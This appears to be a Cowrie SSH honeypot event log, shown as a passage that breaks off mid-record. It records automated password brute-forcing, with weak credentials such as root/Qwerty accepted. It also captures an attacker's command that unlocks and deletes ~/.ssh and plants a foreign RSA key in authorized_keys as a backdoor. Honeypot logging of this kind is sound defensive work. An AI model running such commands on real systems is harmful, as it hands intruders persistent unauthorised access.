{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:52:20.606329Z","src_ip":"212.227.125.160","session":"1a494d195eff"}
{"eventid":"cowrie.login.failed","username":"ts","password":"ts","message":"login attempt [ts/ts] failed","sensor":"my-vps","timestamp":"2025-08-31T00:52:20.828792Z","src_ip":"212.227.125.160","session":"1a494d195eff"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:52:21.952847Z","src_ip":"212.227.125.160","session":"1a494d195eff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41320,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d03e26fbd7c","protocol":"ssh","message":"New connection: 212.227.235.229:41320 (1.2.3.4:22) [session: 9d03e26fbd7c]","sensor":"my-vps","timestamp":"2025-08-31T00:52:22.709739Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:52:22.710720Z","src_ip":"212.227.235.229","session":"9d03e26fbd7c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:52:22.778934Z","src_ip":"212.227.235.229","session":"9d03e26fbd7c"}
{"eventid":"cowrie.login.failed","username":"mahailong","password":"123456","message":"login attempt [mahailong/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:52:23.093548Z","src_ip":"212.227.235.229","session":"9d03e26fbd7c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:52:24.164394Z","src_ip":"212.227.235.229","session":"9d03e26fbd7c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34052,"dst_ip":"1.2.3.4","dst_port":22,"session":"117b15443d9a","protocol":"ssh","message":"New connection: 212.227.125.160:34052 (1.2.3.4:22) [session: 117b15443d9a]","sensor":"my-vps","timestamp":"2025-08-31T00:52:30.970033Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:52:30.970936Z","src_ip":"212.227.125.160","session":"117b15443d9a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:52:31.045185Z","src_ip":"212.227.125.160","session":"117b15443d9a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45884,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c63e995300c","protocol":"ssh","message":"New connection: 212.227.235.229:45884 (1.2.3.4:22) [session: 7c63e995300c]","sensor":"my-vps","timestamp":"2025-08-31T00:52:31.178547Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:52:31.182022Z","src_ip":"212.227.235.229","session":"7c63e995300c"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwerty","message":"login attempt [root/Qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:52:31.298903Z","src_ip":"212.227.125.160","session":"117b15443d9a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:52:31.417522Z","src_ip":"212.227.235.229","session":"7c63e995300c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:52:31.626422Z","src_ip":"212.227.125.160","session":"117b15443d9a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T00:52:31.627234Z","src_ip":"212.227.125.160","session":"117b15443d9a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:52:31.702447Z","src_ip":"212.227.125.160","session":"117b15443d9a"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:52:31.703693Z","src_ip":"212.227.125.160","session":"117b15443d9a"}
{"eventid":"cowrie.login.success","username":"root","password":"database","message":"login attempt [root/database] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:52:32.385839Z","src_ip":"212.227.235.229","session":"7c63e995300c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:52:32.874485Z","src_ip":"212.227.235.229","session":"7c63e995300c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:52:32.875345Z","src_ip":"212.227.235.229","session":"7c63e995300c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:52:32.876214Z","src_ip":"212.227.235.229","session":"7c63e995300c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:52:33.122086Z","src_ip":"212.227.235.229","session":"7c63e995300c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49872,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ac6c7565caf","protocol":"ssh","message":"New connection: 212.227.125.160:49872 (1.2.3.4:22) [session: 6ac6c7565caf]","sensor":"my-vps","timestamp":"2025-08-31T00:52:33.469941Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:52:33.635641Z","src_ip":"212.227.125.160","session":"6ac6c7565caf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:52:34.098142Z","src_ip":"212.227.235.229","session":"7c63e995300c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T00:52:34.099113Z","src_ip":"212.227.235.229","session":"7c63e995300c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:52:34.323828Z","src_ip":"212.227.125.160","session":"6ac6c7565caf"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T00:52:34.347783Z","src_ip":"212.227.235.229","session":"7c63e995300c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:52:34.348593Z","src_ip":"212.227.235.229","session":"7c63e995300c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47276,"dst_ip":"1.2.3.4","dst_port":22,"session":"e93eca02ce35","protocol":"ssh","message":"New connection: 212.227.235.229:47276 (1.2.3.4:22) [session: e93eca02ce35]","sensor":"my-vps","timestamp":"2025-08-31T00:52:34.581107Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:52:34.586418Z","src_ip":"212.227.235.229","session":"e93eca02ce35"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:52:34.820930Z","src_ip":"212.227.235.229","session":"e93eca02ce35"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T00:52:35.771016Z","src_ip":"212.227.235.229","session":"e93eca02ce35"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"letmein","message":"login attempt [daemon/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T00:52:36.287802Z","src_ip":"212.227.125.160","session":"6ac6c7565caf"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:52:37.017772Z","src_ip":"212.227.235.229","session":"e93eca02ce35"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48620,"dst_ip":"1.2.3.4","dst_port":22,"session":"12948b6862b1","protocol":"ssh","message":"New connection: 212.227.235.229:48620 (1.2.3.4:22) [session: 12948b6862b1]","sensor":"my-vps","timestamp":"2025-08-31T00:52:37.243799Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:52:37.247632Z","src_ip":"212.227.235.229","session":"12948b6862b1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:52:37.478368Z","src_ip":"212.227.235.229","session":"12948b6862b1"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:52:37.959419Z","src_ip":"212.227.125.160","session":"6ac6c7565caf"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:52:38.406626Z","src_ip":"212.227.235.229","session":"12948b6862b1"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:52:38.641093Z","src_ip":"212.227.235.229","session":"12948b6862b1"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:52:38.646495Z","src_ip":"212.227.235.229","session":"7c63e995300c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48454,"dst_ip":"1.2.3.4","dst_port":22,"session":"1fd74b9f1a4f","protocol":"ssh","message":"New connection: 212.227.125.160:48454 (1.2.3.4:22) [session: 1fd74b9f1a4f]","sensor":"my-vps","timestamp":"2025-08-31T00:52:41.316972Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:52:41.317602Z","src_ip":"212.227.125.160","session":"1fd74b9f1a4f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:52:41.392117Z","src_ip":"212.227.125.160","session":"1fd74b9f1a4f"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"abc123","message":"login attempt [ftpuser/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:52:41.623914Z","src_ip":"212.227.125.160","session":"1fd74b9f1a4f"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:52:42.780364Z","src_ip":"212.227.125.160","session":"1fd74b9f1a4f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54048,"dst_ip":"1.2.3.4","dst_port":22,"session":"70f53885ef30","protocol":"ssh","message":"New connection: 212.227.125.160:54048 (1.2.3.4:22) [session: 70f53885ef30]","sensor":"my-vps","timestamp":"2025-08-31T00:52:51.726273Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:52:51.727409Z","src_ip":"212.227.125.160","session":"70f53885ef30"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@open